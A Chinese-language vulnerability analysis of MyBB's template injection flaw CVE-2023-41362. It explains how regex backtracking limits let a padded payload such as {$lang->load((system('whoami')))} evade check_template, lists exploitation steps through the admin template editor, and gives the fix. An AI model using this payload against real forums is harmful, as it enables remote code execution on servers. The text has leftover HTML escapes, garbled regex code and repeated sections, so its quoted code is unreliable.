MyBB模板注入漏洞(CVE-2023-41362)深入分析与利用<\/h1>

漏洞概述<\/h2>
MyBB是一款免费的开源论坛软件，使用PHP开发，支持用户自定义模板。在MyBB<1.8.36的版本中，存在模板注入漏洞(CVE-2023-41362)，攻击者可以通过精心构造的模板内容绕过安全限制，最终导致远程代码执行。<\/p>

漏洞位置<\/h2>

漏洞位于后台的模板编辑功能处，具体路径为：<\/p>

\/admin\/index.php?module=style-templates&action=edit_template
<\/code><\/pre>
漏洞分析<\/h2>
请求处理流程<\/h3>


请求通过\/admin\/index.php<\/code>处理，module<\/code>参数被"-"分割：<\/p>

module=style-templates<\/code> → $run_module=style<\/code>和$action_file=templates<\/code><\/li>
最终包含\/admin\/modules\/style\/templates.php<\/code><\/li>
<\/ul>
<\/li>

在templates.php<\/code>中，接收action<\/code>参数执行编辑模板操作：<\/p>

先进行安全检查(check_template<\/code>)<\/li>
通过后更新数据库中的模板内容<\/li>
访问模板时通过eval<\/code>函数执行模板内容<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞利用途径<\/h3>
有两种可能的利用方案：<\/p>

绕过check_template<\/code>的限制注入恶意代码<\/li>
通过SQL注入直接向数据库写入恶意模板代码<\/li>
<\/ol>
安全检查机制<\/h3>
check_template<\/code>函数实现如下：<\/p>
function<\/span> check_template<\/span>($template) {
<\/span><\/span>    \/\/ 检查是否包含数据库配置信息
<\/span><\/span><\/span><\/span>    if<\/span> (preg_match<\/span>('#\$config\database[database|hostname|password|table_prefix|username)i#'<\/span>, $template)) {
<\/span><\/span>        return<\/span> true<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 检查系统调用(反引号)
<\/span><\/span><\/span><\/span>    if<\/span> (preg_match<\/span>('#\$\s*\{#'<\/span>, $template)) {
<\/span><\/span>        return<\/span> true<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    \/\/ 其他恶意行为检查
<\/span><\/span><\/span><\/span>    if<\/span> (preg_match<\/span>("~s"<\/span>, preg_replace<\/span>('~a-zA-Z_][a-zA-Z_0-9]a-zA-Z_][a-zA-Z_0-9]*|\
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>\s*a-zA-Z_0-9]+\\2\
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>\s*'<\/span>, ''<\/span>, $template))) {
<\/span><\/span>        return<\/span> true<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    return<\/span> false<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>三个正则表达式的功能：<\/p>

检测模板中是否包含数据库账号密码等敏感字段<\/li>
检测类似"$(任意空白字符){"<\/code>格式的恶意代码<\/li>
将合法模板插值(如{$a}<\/code>, {$a->bbb}<\/code>, {$a[bbb]}<\/code>, {$a[b][b][b]}<\/code>)替换为空后，检查是否仍包含恶意插值<\/li>
<\/ol>
正则回溯漏洞<\/h3>
PHP使用PCRE库实现正则表达式，属于NFA(非确定性有限状态自动机)引擎，存在回溯问题。<\/p>
回溯示例<\/strong>：<\/p>
preg_match<\/span>('\/.*\d+\/'<\/span>, '<d>A<\/d><d>123<\/d>'<\/span>);
<\/span><\/span><\/code><\/pre>这个匹配会导致多次回溯，回溯次数与数字部分长度成正比。<\/p>
PHP为防止ReDoS攻击，设置了回溯次数上限：<\/p>

preg_match<\/code>超过上限返回false<\/code><\/li>
preg_replace<\/code>超过上限返回null<\/code><\/li>
<\/ul>
绕过安全检查<\/h3>
通过构造足够长的payload使正则处理达到回溯上限：<\/p>


对于preg_replace<\/code>：<\/p>

构造形如{$a[0][0][0]...}<\/code>的多维数组<\/li>
测试发现约5k字符即可使preg_replace<\/code>返回null<\/code><\/li>
<\/ul>
<\/li>

对于preg_match<\/code>：<\/p>

需要约90w字符才能达到回溯上限<\/li>
不实用<\/li>
<\/ul>
<\/li>
<\/ol>
有效payload构造<\/h3>
初始尝试：<\/p>
{$system('whoami'<\/span>)}{$a[0<\/span>][0<\/span>][0<\/span>]...<\/span>}
<\/span><\/span><\/code><\/pre>但MyBB模板引擎无法直接解析{$system('whoami')}<\/code>。<\/p>
改进方案：

观察默认模板调用方式，利用$lang<\/code>对象：<\/p>
{$lang-><\/span>load<\/span>((system<\/span>('whoami'<\/span>)))}{$a[0<\/span>][0<\/span>][0<\/span>]...<\/span>}
<\/span><\/span><\/code><\/pre>完整利用步骤<\/h3>

登录后台，进入模板编辑界面<\/li>
编辑任一模板(如"online"模板)<\/li>
插入恶意payload：
{$lang-><\/span>load<\/span>((system<\/span>('whoami'<\/span>)))}{$a[0<\/span>][0<\/span>][0<\/span>][0<\/span>][0<\/span>]...<\/span>}
<\/span><\/span><\/code><\/pre>其中[0][0][0]...<\/code>部分需要足够长度(约5000字符)<\/li>
保存模板<\/li>
访问触发模板解析的页面，命令将被执行<\/li>
<\/ol>
漏洞修复<\/h2>
官方修复方案：<\/p>

检查preg_match<\/code>返回值不能为false<\/code><\/li>
检查preg_replace<\/code>返回值不能为null<\/code><\/li>
<\/ol>
升级到MyBB 1.8.36或更高版本可修复此漏洞。<\/p>
防御建议<\/h2>

及时升级到最新版本<\/li>
限制后台访问权限<\/li>
对模板内容进行更严格的白名单过滤<\/li>
考虑使用更安全的模板引擎替代方案<\/li>
<\/ol>
总结<\/h2>
该漏洞利用正则引擎的回溯特性绕过安全检查，展示了即使看似严格的安全机制也可能因实现细节而被绕过。开发人员应特别注意正则表达式的性能和安全影响，特别是在处理用户输入时。<\/p>

MyBB模板注入漏洞(CVE-2023-41362)深入分析与利用<\/h1>

漏洞概述<\/h2> MyBB是一款免费的开源论坛软件，使用PHP开发，支持用户自定义模板。在MyBB<1.8.36的版本中，存在模板注入漏洞(CVE-2023-41362)，攻击者可以通过精心构造的模板内容绕过安全限制，最终导致远程代码执行。<\/p>

漏洞分析<\/h2>

总结<\/h2> 该漏洞利用正则引擎的回溯特性绕过安全检查，展示了即使看似严格的安全机制也可能因实现细节而被绕过。开发人员应特别注意正则表达式的性能和安全影响，特别是在处理用户输入时。<\/p>

漏洞概述<\/h2>
MyBB是一款免费的开源论坛软件，使用PHP开发，支持用户自定义模板。在MyBB<1.8.36的版本中，存在模板注入漏洞(CVE-2023-41362)，攻击者可以通过精心构造的模板内容绕过安全限制，最终导致远程代码执行。<\/p>

总结<\/h2>
该漏洞利用正则引擎的回溯特性绕过安全检查，展示了即使看似严格的安全机制也可能因实现细节而被绕过。开发人员应特别注意正则表达式的性能和安全影响，特别是在处理用户输入时。<\/p>